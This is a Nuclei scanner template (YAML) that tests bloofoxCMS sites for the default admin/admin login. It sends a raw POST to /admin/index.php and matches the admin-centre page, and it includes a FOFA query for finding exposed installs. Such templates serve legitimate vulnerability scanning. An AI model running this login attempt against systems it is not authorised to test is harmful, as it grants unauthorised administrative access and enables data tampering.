nuclei-templates/http/default-logins/bloofoxcms-default-login.yaml

42 lines
1.0 KiB
YAML

id: bloofoxcms-default-login
info:
name: bloofoxCMS - Default Login
author: theamanrawat
severity: high
description: |
bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.bloofox.com/automated_setup.113.html
- https://www.bloofox.com
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 1
tags: bloofox,cms,default-login
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- contains(body, 'bloofoxCMS Admincenter')
- status_code == 200
condition: and